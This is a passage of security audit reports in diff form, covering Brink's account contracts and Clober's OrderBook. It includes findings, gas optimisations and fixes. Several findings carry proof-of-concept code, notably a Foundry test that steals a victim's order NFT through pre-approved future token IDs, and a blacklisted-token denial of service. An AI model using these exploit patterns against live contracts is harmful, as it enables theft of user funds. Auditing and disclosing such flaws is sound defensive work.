A second issue is related to how the executors perform the execution. Brink mentioned that these transactions are currently sent to the public mempool (via Alchemy). Assuming permissionless contracts are used throughout, this leads to front-running risk, as anyone can copy the calldata of the transaction and front-run it. The original executor's transaction will still end up on chain, except that it will revert, leading to the executor paying for gas and getting nothing in return. Although front-running does not directly add security risk to the protocol, it indirectly affects it, as being an executor becomes less profitable. Note that, regardless of the front-running issue, the problem of executors paying gas for a failed transaction can still happen in practice: if multiple executors concurrently send the same transaction to the mempool, only one of them can profit from the opportunity. One way to solve this issue is to use a service like Flashbots. This offers two advantages: 1. The transaction will remain private in the mempool, i.e., front-running can be avoided. 2. You can configure it not to include a transaction in the block if it reverts (this is the default configuration). This would prevent executors from paying gas for reverting transactions. Note: an alternative for (2) along with (1) is to use Ethermine's MEV relay. However, it has a lower hash rate than Flashbots. Note: an alternative for (1) is to use Taichi's private transactions.

7 Appendix 7.1 Gas optimization: Use calldata instead of memory for function parameters In some cases, having function arguments in calldata instead of memory is more optimal. Consider the following generic example:

contract C {
    function add(uint[] memory arr) external returns (uint sum) {
        uint length = arr.length;
        for (uint i = 0; i < length; i++) {
            sum += arr[i];
        }
    }
}

In the above example, the dynamic array arr has the storage location memory. When the function gets called externally, the array values are kept in calldata and copied to memory during ABI decoding (using the opcodes calldataload and mstore). During the for loop, arr[i] accesses the value in memory using an mload. However, for the above example this is inefficient. Consider the following snippet instead:

contract C {
    function add(uint[] calldata arr) external returns (uint sum) {
        uint length = arr.length;
        for (uint i = 0; i < length; i++) {
            sum += arr[i];
        }
    }
}

In this snippet, instead of going via memory, the value is directly read from calldata using calldataload. That is, there are no intermediate memory operations that carry this value. Gas savings: In the former example, the ABI decoding begins with copying the values from calldata to memory in a loop. Each iteration costs at least 60 gas. In the latter example, this can be completely avoided. It also reduces the number of instructions and therefore the deploy-time cost of the contract. In short, use calldata instead of memory if the function argument is only read. Note that in older Solidity versions, changing some function arguments from memory to calldata may cause an "unimplemented feature error". This can be avoided by using a newer (0.8.*) Solidity compiler.
diff --git a/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-2.txt b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-2.txt new file mode 100644 index 0000000..10b212f --- /dev/null +++ b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-2.txt @@ -0,0 +1,13 @@

+4.1.1 Inline assembly leaves dirty higher order bits for the _proxyOwner variable Severity: Low, Gas optimization Context: Account.sol#L160-L165

function proxyOwner() internal view returns (address _proxyOwner) {
    assembly {
        extcodecopy(address(), mload(0x40), 0x2d, 0x14)
        _proxyOwner := mload(sub(mload(0x40), 0x0c))
    }
}

The expression mload(sub(mload(0x40), 0x0c)) reads from a memory location that was not directly used in the context of proxyOwner; more specifically, the memory location starting from mload(0x40) - 0x0c until mload(0x40). Since the contents of this location cannot be predicted (Solidity does not clean up memory after use), the _proxyOwner variable will have dirty higher order bits, i.e., the most significant 12 bytes (32 - 20) need not be zero. However, the compiler would clean up this value towards the end of the function by doing _proxyOwner := and(2**160 - 1, _proxyOwner). Recommendation: Internally, the Solidity compiler tries to be careful about not leaving dirty higher order bits. Many critical compiler bugs are the result of the compiler missing such cleanups. We recommend using a right shift (shr) to properly clean the value read from memory.

extcodecopy(address(), mload(0x40), 0x2d, 0x14)
_proxyOwner := shr(0x60, mload(mload(0x40)))

This also saves some gas. Note: The SHR instruction (EIP-145) was introduced at the same time as CREATE2 (EIP-1014), and since the project relies on CREATE2, this change should not cause any issues when deploying on other EVM-compatible chains. These changes were introduced in the Petersburg hardfork. For deploying on EVM-compatible chains, we recommend documenting this requirement. A proof of concept is provided in the appendix. Brink: Fixed in PR #43. Spearbit: Resolved.

+4.1.2 The function deployAndCall may silently fail during account creation Severity: Low Context: 1. AccountFactory.sol#L23. 2. DeployAndCall.sol#L17 The function deployAndCall relies on AccountFactory.deployAccount to create a new account and to return its address. This function currently just passes through the return value of the underlying CREATE2 instruction. This instruction will return the value 0 in certain failure cases. The function deployAndCall will then call this newly created account if callData.length > 0. In case of a CREATE2 failure this will result in calling address(0), successfully. One quirky failure condition of CREATE2 resulting in 0 is when it runs out of call depth, i.e., it is the 1024th call in the transaction frame. This is fairly easy for a malicious actor to accomplish. In this case deployAndCall will silently fail. Recommendation: A suggested remedy is to have a require(account != 0); statement in AccountFactory.deployAccount. Reference: yellowpaper. Brink: Fixed in PR #47. Spearbit: Resolved.
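To illustrate the suggested remedy, a minimal self-contained sketch (ours; the placeholder salt, error string and simplified init-code handling are hypothetical, not Brink's actual deployAccount):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

contract DeployGuardSketch {
    bytes32 private constant SALT = bytes32(0); // placeholder salt

    function deploy(bytes memory initCode) external returns (address account) {
        assembly {
            account := create2(0, add(initCode, 0x20), mload(initCode), SALT)
        }
        // CREATE2 pushes 0 on failure (address collision, constructor revert,
        // or call-depth exhaustion); fail loudly instead of letting callers
        // proceed to call address(0) "successfully".
        require(account != address(0), "DEPLOY_FAILED");
    }
}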
4.2 Gas Optimizations and Informational

+4.2.1 Hardcode mload(initCode) to save 3 gas Severity: Gas Optimization Context: AccountFactory.sol#L23.

@@ -20,7 +20,7 @@ contract AccountFactory {
         owner
     );
     assembly {
-        account := create2(0, add(initCode, 0x20), mload(initCode), SALT)
+        account := create2(0, add(initCode, 0x20), 0x4B, SALT)
     }
 }

+4.2.2 Use scratch space in proxyOwner to save gas Severity: Gas Optimization Context: Account.sol#L163 Recap the suggested code from the first issue above:

extcodecopy(address(), mload(0x40), 0x2d, 0x14)
_proxyOwner := shr(0x60, mload(mload(0x40)))

This currently relies on the free memory pointer, which is the advisable way to use memory. However, for short memory requirements, it is possible to use the so-called scratch space. From the Layout in Memory section of the Solidity documentation: Scratch space can be used between statements (i.e. within inline assembly). Possible code making use of this is the following:

extcodecopy(address(), 0, 0x2d, 0x14)
_proxyOwner := shr(0x60, mload(0))

Note that this saves two MLOADs. Note: While Solidity has not changed the memory layout and these reserved slots for a very long time, it cannot be guaranteed that this will be the case in the future. For this reason we also recommend leaving a comment in the code should this change be enacted. Brink: Fixed in PR #47. Spearbit: Resolved.

+4.2.3 Saving 1 byte off the constructor code Severity: Informational Context: AccountFactory.sol#L19 The following is the current constructor for the account:

PC     Opcode              Stack
00000  RETURNDATASIZE      [0]
00001  PUSH1 0x41          [0x41, 0]
00003  DUP1                [0x41, 0x41, 0]
00004  PUSH1 0x0a          [0x0a, 0x41, 0x41, 0]
00006  RETURNDATASIZE      [0, 0x0a, 0x41, 0x41, 0]
00007  CODECOPY            [0x41, 0]
00008  DUP2                [0, 0x41, 0]
00009  RETURN              [0]

However, the DUP2 before the RETURN indicates a possible optimization by rearranging the stack. Here, the number 0x0a denotes the offset of the runtime code. Let's denote this by offset; then the following would be a more optimal constructor code (a concrete encoding is sketched after 4.2.4 below):

PC     Opcode              Stack
00000  PUSH1 0x41          [0x41]
00002  RETURNDATASIZE      [0, 0x41]
00003  DUP2                [0x41, 0, 0x41]
00004  PUSH1 offset        [offset, 0x41, 0, 0x41]
00006  RETURNDATASIZE      [0, offset, 0x41, 0, 0x41]
00007  CODECOPY            [0, 0x41]
00008  RETURN              []

Brink: Fixed in PR #47. Spearbit: Resolved.

+4.2.4 Vanity address optimization Severity: Gas optimization By finding an appropriate salt for the implementation contract, so that the deployment address has as many leading zeros as possible, it is possible to save gas on the account factory deployment. This is because one can replace a push20 20-byte-constant with, say, a push16 16-byte-constant. The latter is 4 bytes shorter than the former, and therefore decreases the deployment gas cost. The following tool can be used to search for CREATE2 vanity addresses: ERADICATE2. Generally, the more time available for the search, the higher the probability of finding more leading zeroes. Attaining 2 leading zeroes should be a matter of seconds. Note: the code of the minimal proxy as well as the code in proxyOwner() needs to be updated to support a short address. Note: a vanity address is most relevant for Account.sol. It might also have a slight advantage for the verifiers. For the minimal proxy, which is deployed per user, it is not important. Brink: Fixed in PR #47. Spearbit: Resolved.
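For concreteness, one possible encoding of the optimised constructor from 4.2.3 (our own assembly of the table above, under the assumption that the runtime code stays 0x41 bytes; since the constructor shrinks from 10 to 9 bytes, offset becomes 0x09):

// PUSH1 0x41, RETURNDATASIZE, DUP2, PUSH1 0x09, RETURNDATASIZE, CODECOPY, RETURN
bytes constant OPTIMIZED_CONSTRUCTOR = hex"60413d8160093d39f3";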
+4.2.5 Use bytes.concat instead of abi.encodePacked Severity: Informational Context: AccountFactory.sol#L16-L21 Since 0.8.4 it is possible to use bytes.concat, which expects literals, bytes, and bytesNN inputs, and is aimed at replacing most use cases of abi.encodePacked. It is more expressive, avoids the complex rules of abi.encodePacked, and the latter is expected to be phased out in the future. This suggestion applies throughout the code, but especially in AccountFactory.deployAccount, where it would improve readability by showing the layout clearly:

- bytes memory initCode = abi.encodePacked(
-     ....
-     owner
- );
+ bytes memory initCode = bytes.concat(
+     ....
+     bytes20(owner)
+ );
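As a self-contained illustration of the equivalence (the contract, names and values are ours):

contract ConcatDemo {
    // bytes.concat only takes bytes and bytesNN arguments, so the address
    // must be cast to bytes20 explicitly, making the packed 20-byte layout
    // visible; abi.encodePacked accepts address directly and hides the rule.
    function build(address owner) external pure returns (bytes memory a, bytes memory b) {
        a = bytes.concat(hex"3d6041", bytes20(owner));
        b = abi.encodePacked(hex"3d6041", owner);
        // a and b are byte-for-byte identical.
    }
}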
+4.2.6 Use .code.length instead of extcodesize in inline assembly Severity: Informational Context: SaltedDeployer.sol#L48-L58

 function _isContract(address account) internal view returns (bool) {
-    // This method relies on extcodesize, which returns 0 for contracts in construction, since the code is only stored
-    // at the end of the constructor execution.
-    uint256 size;
-    assembly {
-        size := extcodesize(account)
-    }
-    return size > 0;
+    return account.code.length > 0;
 }

Note: In the past (before 0.8.1), this was inefficient (Solidity used to do an extcodecopy to copy the entire code to memory and then calculate the size of this byte array in memory, instead of directly using extcodesize). But since 0.8.1, Solidity avoids the memory copy and only uses extcodesize. Brink: Fixed in PR #47. Spearbit: Resolved.

+4.2.7 Use a file-level constant for SALT Severity: Informational Context: 1. AccountFactory.sol#L9. 2. SaltedDeployer.sol#L20.

/// @dev Salt used for salted deployments
bytes32 constant SALT = 0x841eb53dae7d7c32f92a7e2a07956fb3b9b1532166bc47aa8f091f49bcaa9ff5;

This salt is duplicated in both the contracts Account/AccountFactory.sol and Deployers/SaltedDeployer.sol. It may make sense to place SALT as a file-level constant in AccountFactory and use that in SaltedDeployer. This would reduce the risk of a mismatched salt during future changes. Brink: No longer relevant after the salt was set to 0 in AccountFactory. Spearbit: Resolved.

+4.2.8 Use constants for offsets in proxyOwner Severity: Informational Context: Account.sol#L162 extcodecopy(address(), mload(0x40), 0x2d, 0x14) The offset 0x2d is hardcoded in Account, but it relies on the layout provided by AccountFactory. It may make sense to provide a file-level constant in AccountFactory.sol and use that: uint256 constant PROXY_OWNER_OFFSET = 0x2d; This would reduce the risk of mismatched offsets during future changes.

+4.2.9 Document that the variable callData must have location memory in the function deployAndCall Severity: Informational Context: DeployAndCall.sol#L16 In Batched/DeployAndCall.sol the function function deployAndCall(address owner, bytes memory callData) external payable; has the variable callData marked as memory. Purely by looking at the function signature, one would suggest using the calldata location specifier here. This would be incorrect, because the function body uses assembly code relying on the memory layout caused by the memory specifier. It is suggested to include a comment in the code to ensure the location remains unchanged.

+4.2.10 Document that deployAndCall may not call the created account Severity: Informational Context: DeployAndCall.sol#L15 In Batched/DeployAndCall.sol the function deployAndCall(address owner, bytes memory callData) deploys a new account and calls into it. While it always deploys a new account, it only calls into it if callData is non-empty. It is advisable to document this feature in the NatSpec description.
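A sketch of the suggested documentation for both points above (the wording is ours, not Brink's):

/// @notice Deploys a new account for `owner`; when `callData` is non-empty,
///         it also calls into the freshly deployed account.
/// @dev `callData` must keep the `memory` location: the assembly in the body
///      relies on the memory layout the `memory` specifier produces.
function deployAndCall(address owner, bytes memory callData) external payable;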
+4.2.11 Using underscores to improve readability of hex values Severity: Informational Context: AccountFactory.sol#L19 Adding underscores as delimiters improves readability.

@@ -15,8 +15,8 @@ contract AccountFactory {
     /// address added to the deployed bytecode. The owner address can be read within a delegatecall by using `extcodecopy`
     function deployAccount(address owner) external returns (address account) {
         bytes memory initCode = abi.encodePacked(
-            // [*** constructor **][**** eip-1167 ****]...
-            hex'3d604180600a3d3981f3363d3d373d3d3d363d73...
+            // [*** constructor **]_[**** eip-1167 ****]_...
+            hex'3d604180600a3d3981f3_363d3d373d3d3d363d73_...
             owner
         );
         assembly {

Brink: Fixed in PR #47. Spearbit: Resolved.

5 Custom proxy code The contract implements a slightly customized version of the EIP-1167 proxy contract.

5.1 Difference to EIP-1167 The main change is the inclusion of an owner address to be used for NotOwner checks. This is accomplished by concatenating the owner address to the end of the deployed code. It is done without padding. Two main concerns arise here: 1. Is it possible for execution to flow into the data (the owner address)? 2. Is the address correctly and efficiently read in the NotOwner check? The second question has been addressed in the section "use scratch space". Regarding the first question, we note that the EVM has no native support for code/data separation, but several proposals aim at providing it (e.g. EIP-2327 and EIP-3540). Setting this aside, we can analyze the control flow. The only control flow instruction is JUMPI, which is immediately preceded by a PUSH1 instruction. We can call this a static jump, and conclude that both the destination (the jump) and falling through end up at RETURN or REVERT, respectively. Also note that several other preceding instructions could abort for various reasons. One best practice the Solidity compiler follows is the insertion of a special marker, the INVALID (0xfe) instruction, between code and data. This could be done here too, with little benefit.

5.2 Deploy-time The deploy-time code is similar to the one in an earlier version of EIP-1167. We have suggested a gas optimisation in the section "saving 1 byte off the constructor code". See also comments in ethereum-magicians.

5.3 Runtime The runtime code prior to the audit is identical to the one suggested in EIP-1167. We suggest considering vanity addresses as described in the section "vanity address optimization". This suggestion is also mentioned in the EIP. Additionally, one could consider a further optimisation of reordering the stack layout to save on SWAP/DUP instructions. A method has been described in this coinmonks article.

5.4 Remarks The EIP-1167 proxy code is not easily readable due to optimisations. The varying costs of instructions motivate unconventional code: e.g. DUPn and SWAPn cost 3 gas, while RETURNDATASIZE only costs 2 and is initially 0, but can turn non-zero after certain instructions. Using RETURNDATASIZE is a common practice, but it does not come without risks. Proposals could change the semantics of this instruction in certain cases. While this is unlikely to happen, proposals like EIP-2733 do have a slight chance, as they do not break existing contract executions, only contracts that use the instruction in a certain way. While it is likely a futile attempt to be entirely future proof, one could consider other instructions, such as MSIZE (before memory expansion this returns 0), PC (is 0 as the first instruction), and using DUPn more (which comes at a slight gas increase).

6 Appendix 6.1 Proof of concept for dirty higher order bits

pragma abicoder v1;

contract Test {
    bytes32 constant SALT = 0x841eb53dae7d7c32f92a7e2a07956fb3b9b1532166bc47aa8f091f49bcaa9ff5;
    address constant random_address = 0x94324fcF2cC42F702F7dCBEe5e61E947DC9e2D91;
    address immutable proxy = deployAccount(random_address);
    uint256 constant junk = type(uint256).max;

    /// deployAccount from AccountFactory.
    function deployAccount(address owner) internal returns (address account) {
        ...
    }

    /// Note: returns bytes32 instead of address,
    /// so that the compiler does not perform cleanup.
    function proxyOwner(address _proxy) internal view returns (bytes32 _proxyOwner) {
        assembly {
            extcodecopy(_proxy, mload(0x40), 0x2d, 0x14)
            _proxyOwner := mload(sub(mload(0x40), 0x0c))
        }
    }

    /// returns
    /// 0xffffffffffffffffffffffff94324fcf2cc42f702f7dcbee5e61e947dc9e2d91
    /// instead of
    /// 0x94324fcf2cc42f702f7dcbee5e61e947dc9e2d91
    function test() external returns (bytes32) {
        assembly {
            // Store junk at the current free memory
            mstore(mload(0x40), junk)
            // Increment the free memory pointer
            mstore(0x40, add(mload(0x40), 0x20))
        }
        return proxyOwner(proxy);
    }
}

diff --git a/findings_newupdate/spearbit/Clober-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Clober-Spearbit-Security-Review.txt new file mode 100644 index 0000000..d8fd941 --- /dev/null +++ b/findings_newupdate/spearbit/Clober-Spearbit-Security-Review.txt @@ -0,0 +1,57 @@

+5.1.1 OrderBook Denial of Service leveraging blacklistable tokens like USDC Severity: Critical Risk Context: OrderBook.sol#L649-L666 - audit commit OrderBook.sol#L687-L706 - dev commit Description: The issue was spotted while analysing additional impact of, and the fix for, issue 67. The proof of concept was checked with the original audit commit 28062f477f571b38fe4f8455170bd11094a71862 and the newest available commit from the dev branch, 2ed4370b5de9cec5c455f5485358db194f093b01. Due to the architectural decision to implement the order queue as a cyclic buffer, the OrderBook, after reaching MAX_ORDERS (~32k) for a given price point, starts to overwrite stale orders. If an order was never claimed, or it is broken so that it cannot be claimed, it is not possible to place a new order in the queue. This emerges due to the fact that it is not possible to finalize the stale order and deliver the underlying assets, which is done while placing a new order that replaces a stale one. Effectively, this issue can be used to block the main functionality of the OrderBook, i.e. placing new orders for a given price point. Only a single broken order per price point is enough to lead to this condition. The issue will not be immediately visible, as it requires the cyclic buffer to make a full circle and encounter the broken order. The proof of concept in the SecurityAuditTests.sol attachment implements a simple scenario where a USDC-like mock token is used: 1. Mallory creates one ASK order at some price point (to sell X base tokens for Y quote tokens). 2. Mallory transfers ownership of the OrderNFT token to an address which is blacklisted by the quoteToken (e.g. USDC). 3. The orders queue, implemented as a circular buffer, overflows over time and starts replacing old orders. 4. When it is time to replace the order, the quoteToken is about to be transferred, but due to the blacklist the assets cannot be delivered. 5. At this point it is impossible to place new orders at this price index, unless the owner of the OrderNFT transfers it to somebody who can receive the quoteToken. Proof of concept result for the newest 2ed4370b5de9cec5c455f5485358db194f093b01 commit: # $ git clone ... && git checkout 2ed4370b5de9cec5c455f5485358db194f093b01 # $ forge test -m "test_security_BlockOrderQueueWithBlacklistableToken" [25766] MockOrderBook::limitOrder(0x0000000000000000000000000000000000004444, 3, 0,
333333333333333334, 2, 0x) [8128] OrderNFT::onBurn(false, 3, 0) [1448] MockOrderBook::getOrder((false, 3, 0)) [staticcall] ← (1, 0, 0x00000000000000000000000000000000DeaDBeef) emit Approval(owner: 0x00000000000000000000000000000000DeaDBeef, approved: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) emit Transfer(from: 0x00000000000000000000000000000000DeaDBeef, to: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) ← () emit ClaimOrder(claimer: 0x0000000000000000000000000000000000004444, user: 0x00000000000000000000000000000000DeaDBeef, rawAmount: 1, bountyAmount: 0, orderIndex: 0, priceIndex: 3, isBase: false) [714] MockSimpleBlockableToken::transfer(0x00000000000000000000000000000000DeaDBeef, 10000) ← "blocked" ← "blocked" ← "blocked"

In real life all *-USDC and USDC-* pairs, as well as other pairs where a single token implements a block list, are affected. The issue is also appealing to the attacker because, at any time, if the attacker controls the blacklisted wallet address, he/she can transfer the unclaimable OrderNFT to a whitelisted address to claim his/her assets and re-enable processing until the next broken order is placed in the cyclic buffer. It can be used either to manipulate the market by blocking certain types of orders at given price points, or simply to blackmail the DAO into resuming operations. Recommendation: Prevent the blocking condition by removing forced transfers in claim while replacing stale orders. Clober: Fixed clober-dex/core/pull/363. Spearbit: Fix verified. A global _orders mapping allowing storage of unique orders was added, so it is no longer needed to force claim and transfer while replacing a stale order. makeOrder() ensures that the stale order has been fully filled before replacing it. When claiming the stale order, _calculateClaimableRawAmount returns the stale order's filled amount.

if (orderKey.orderIndex + _MAX_ORDER < queue.index) {
    // replaced order
    return orderOpenAmount;
}

+5.1.2 Overflow in SegmentedSegmentTree464 Severity: Critical Risk Context: SegmentedSegmentTree464.sol#L173 Description: SegmentedSegmentTree464.update needs to perform an overflow check in case the new value is greater than the old value. This overflow check is done when adding the new difference to each node in each layer (using addClean). Furthermore, there is a final overflow check performed by adding up all nodes in the first layer in total(core). However, in total, the nodes in individual groups are added using DirtyUint64.sumPackedUnsafe:

function total(Core storage core) internal view returns (uint64) {
    return DirtyUint64.sumPackedUnsafe(core.layers[0][0], 0, _C) +
        DirtyUint64.sumPackedUnsafe(core.layers[0][1], 0, _C);
}

The nodes in a group can overflow without triggering an overflow & revert. The impact is that the order book depth and claim functionalities break for all users.
// SPDX-License-Identifier: BUSL-1.1
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/StdJson.sol";
import "../../contracts/mocks/SegmentedSegmentTree464Wrapper.sol";

contract SegmentedSegmentTree464Test is Test {
    using stdJson for string;

    uint32 private constant _MAX_ORDER = 2**15;
    SegmentedSegmentTree464Wrapper testWrapper;

    function setUp() public {
        testWrapper = new SegmentedSegmentTree464Wrapper();
    }

    function testTotalOverflow() public {
        uint64 half64 = type(uint64).max / 2 + 1;
        testWrapper.update(0, half64);
        // map to the right node of layer 0, group 0
        testWrapper.update(_MAX_ORDER / 2 - 1, half64);
        assertEq(testWrapper.total(), 0);
    }
}

Recommendation: Perform a safe addition for the first layer and rewrite the overflow check.

// DirtyUint64.sumPackedSafe still needs to be implemented and should do checked addition
require(
    uint256(DirtyUint64.sumPackedSafe(core.layers[0][0], 0, _C)) +
        uint256(DirtyUint64.sumPackedSafe(core.layers[0][1], 0, _C)) <= type(uint64).max,
    "TREE_MAX"
);

Clober: Fixed in PR 40. Spearbit: Verified. The fix checks whether the newly updated value can cause an overflow and throws the error early, preventing such operations.

+5.1.3 OrderNFT theft due to controlling future and past tokens of the same order index Severity: Critical Risk Context: OrderBook.sol#L410, OrderNFT.sol#L285 Description: The order queue is implemented as a ring buffer; to get an order (OrderBook.getOrder) the index in the queue is computed as orderIndex % _MAX_ORDER. The owner of an OrderNFT is also looked up through this function.

function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) {
    return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M];
}

CloberOrderBook(market).getOrder(decodeId(tokenId)).owner

Therefore, the current owner of the NFT of orderIndex also owns all NFTs with orderIndex + k * _MAX_ORDER. An attacker can set approvals of future token IDs to themselves. These approvals are not cleared in OrderNFT.onMint when a victim mints such a future token ID, allowing the attacker to steal the NFT and cancel it to claim the victim's tokens.
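To make the index aliasing concrete, a minimal sketch (ours, mirroring the constants above):

uint256 constant _MAX_ORDER = 2**15;       // 32768
uint256 constant _MAX_ORDER_M = 2**15 - 1; // mask equivalent to % 32768

// orderIndex and orderIndex + k * _MAX_ORDER land in the same queue slot,
// e.g. slotOf(5) == slotOf(5 + 32768) == slotOf(5 + 2 * 32768).
function slotOf(uint256 orderIndex) pure returns (uint256) {
    return orderIndex & _MAX_ORDER_M;
}

The full proof of concept follows.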
// SPDX-License-Identifier: BUSL-1.1
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "../../../../contracts/interfaces/CloberMarketSwapCallbackReceiver.sol";
import "../../../../contracts/mocks/MockQuoteToken.sol";
import "../../../../contracts/mocks/MockBaseToken.sol";
import "../../../../contracts/mocks/MockOrderBook.sol";
import "../../../../contracts/markets/VolatileMarket.sol";
import "../../../../contracts/OrderNFT.sol";
import "../utils/MockingFactoryTest.sol";
import "./Constants.sol";

contract ExploitsTest is Test, CloberMarketSwapCallbackReceiver, MockingFactoryTest {
    struct Return {
        address tokenIn;
        address tokenOut;
        uint256 amountIn;
        uint256 amountOut;
        uint256 refundBounty;
    }

    struct Vars {
        uint256 inputAmount;
        uint256 outputAmount;
        uint256 beforePayerQuoteBalance;
        uint256 beforePayerBaseBalance;
        uint256 beforeTakerQuoteBalance;
        uint256 beforeOrderBookEthBalance;
    }

    MockQuoteToken quoteToken;
    MockBaseToken baseToken;
    MockOrderBook orderBook;
    OrderNFT orderToken;

    function setUp() public {
        quoteToken = new MockQuoteToken();
        baseToken = new MockBaseToken();
    }

    function cloberMarketSwapCallback(
        address tokenIn,
        address tokenOut,
        uint256 amountIn,
        uint256 amountOut,
        bytes calldata data
    ) external payable {
        if (data.length != 0) {
            Return memory expectedReturn = abi.decode(data, (Return));
            assertEq(tokenIn, expectedReturn.tokenIn, "ERROR_TOKEN_IN");
            assertEq(tokenOut, expectedReturn.tokenOut, "ERROR_TOKEN_OUT");
            assertEq(amountIn, expectedReturn.amountIn, "ERROR_AMOUNT_IN");
            assertEq(amountOut, expectedReturn.amountOut, "ERROR_AMOUNT_OUT");
            assertEq(msg.value, expectedReturn.refundBounty, "ERROR_REFUND_BOUNTY");
        }
        IERC20(tokenIn).transfer(msg.sender, amountIn);
    }

    function _createOrderBook(int24 makerFee, uint24 takerFee) private {
        orderToken = new OrderNFT();
        orderBook = new MockOrderBook(
            address(orderToken), address(quoteToken), address(baseToken), 1, 10**4, makerFee, takerFee, address(this)
        );
        orderToken.init("", "", address(orderBook), address(this));
        uint256 _quotePrecision = 10**quoteToken.decimals();
        quoteToken.mint(address(this), 1000000000 * _quotePrecision);
        quoteToken.approve(address(orderBook), type(uint256).max);
        uint256 _basePrecision = 10**baseToken.decimals();
        baseToken.mint(address(this), 1000000000 * _basePrecision);
        baseToken.approve(address(orderBook), type(uint256).max);
    }

    function _buildLimitOrderOptions(bool isBid, bool postOnly) private pure returns (uint8) {
        return (isBid ? 1 : 0) + (postOnly ? 2 : 0);
    }

    uint256 private constant _MAX_ORDER = 2**15; // 32768
    uint256 private constant _MAX_ORDER_M = 2**15 - 1; // % 32768

    function testExploit2() public {
        _createOrderBook(0, 0);
        address attacker = address(0x1337);
        address attacker2 = address(0x1338);
        address victim = address(0xbabe);

        // Step 1. Attacker creates an ASK limit order and receives NFT
        uint16 priceIndex = 100;
        uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({
            user: attacker,
            priceIndex: priceIndex,
            rawAmount: 0,
            baseAmount: 1e18,
            options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY),
            data: new bytes(0)
        });

        // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds
        CloberOrderBook.OrderKey memory orderKey =
            CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex});
        uint256 currentTokenId = orderToken.encodeId(orderKey);
        orderKey.orderIndex += _MAX_ORDER;
        uint256 futureTokenId = orderToken.encodeId(orderKey);

        // Step 3. Attacker approves the futureTokenId to themselves, and cancels the current id
        vm.startPrank(attacker);
        orderToken.approve(attacker2, futureTokenId);
        CloberOrderBook.OrderKey[] memory orderKeys = new CloberOrderBook.OrderKey[](1);
        orderKeys[0] = orderKey;
        orderKeys[0].orderIndex = orderIndex; // restore original orderIndex
        orderBook.cancel(attacker, orderKeys);
        vm.stopPrank();

        // Step 4. Attacker fills the queue; the victim's order recycles orderIndex 0
        uint256 victimOrderSize = 1e18;
        for (uint256 i = 0; i < _MAX_ORDER; i++) {
            orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({
                user: i < _MAX_ORDER - 1 ? attacker : victim,
                priceIndex: priceIndex,
                rawAmount: 0,
                baseAmount: victimOrderSize,
                options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY),
                data: new bytes(0)
            });
        }
        assertEq(orderToken.ownerOf(futureTokenId), victim);

        // Step 5. Attacker steals the NFT and can cancel to receive the tokens
        vm.startPrank(attacker2);
        orderToken.transferFrom(victim, attacker, futureTokenId);
        vm.stopPrank();
        assertEq(orderToken.ownerOf(futureTokenId), attacker);
        uint256 baseBalanceBefore = baseToken.balanceOf(attacker);
        vm.startPrank(attacker);
        orderKeys[0].orderIndex = orderIndex + _MAX_ORDER;
        orderBook.cancel(attacker, orderKeys);
        vm.stopPrank();
        assertEq(baseToken.balanceOf(attacker) - baseBalanceBefore, victimOrderSize);
    }
}

Recommendation: The approvals should be cleared in onMint, similar to onBurn. The owner must not control any future or past (already burned) tokens that map to the same index mod _MAX_ORDER. This must be fully prevented to mitigate this attack. Revert in getOrder if the orderKey maps to an NFT that has already been burned or has not been minted yet. See the recommendation of "Order owner isn't zeroed after burning" to correctly detect burned tokens.

 function onMint(
     address to,
     bool isBid,
     uint16 priceIndex,
     uint256 orderIndex
 ) external onlyOrderBook {
     require(to != address(0), Errors.EMPTY_INPUT);
     uint256 tokenId = _encodeId(isBid, priceIndex, orderIndex);
+    // Clear approvals
+    _approve(to, address(0), tokenId);
     _increaseBalance(to);
     emit Transfer(address(0), to, tokenId);
 }

 function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) {
+    uint256 currentIndex = _getQueue(orderKey.isBid, orderKey.priceIndex).index;
+    // valid active tokens are [currentIndex - _MAX_ORDER, currentIndex)
+    require(orderKey.orderIndex < currentIndex, Errors.NFT_INVALID_ID);
+    if (currentIndex >= _MAX_ORDER) {
+        require(orderKey.orderIndex >= currentIndex - _MAX_ORDER, Errors.NFT_INVALID_ID);
+    }
     return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M];
 }

Clober: Due to this issue, I think it would be better to implement the orderIndex validation logic you suggested at the _getOrder function in all external functions that receive an orderIndex/orderKey. Fixed in PR 352. Spearbit: Fixed. The approval reset is not done in onMint but, as discussed, it shouldn't be needed if nobody can control unminted tokens. Furthermore, the fix to "OrderBook Denial of Service leveraging blacklistable tokens like USDC" ensures that each order index is now unique.

+5.1.4 OrderNFT theft due to ambiguous tokenId encoding/decoding scheme Severity: Critical Risk Context: OrderNFT.sol#L249-L274 OrderNFT.sol#L70-L74 OrderNFT.sol#L82-L89 Description: encodeId() uniquely encodes an OrderKey to a uint256 number. However, decodeId() can ambiguously decode many tokenIds to the exact same OrderKey.
This can be problematic due to the fact that the contract uses tokenIds to store approvals. The ambiguity comes from converting the uint8 value to the bool isBid value here:

function decodeId(uint256 id) public pure returns (CloberOrderBook.OrderKey memory) {
    uint8 isBid;
    uint16 priceIndex;
    uint232 orderIndex;
    assembly {
        orderIndex := id
        priceIndex := shr(232, id)
        isBid := shr(248, id)
    }
    return CloberOrderBook.OrderKey({isBid: isBid == 1, priceIndex: priceIndex, orderIndex: orderIndex});
}

(Note that the attack is possible only for ASK limit orders.) Proof of Concept:

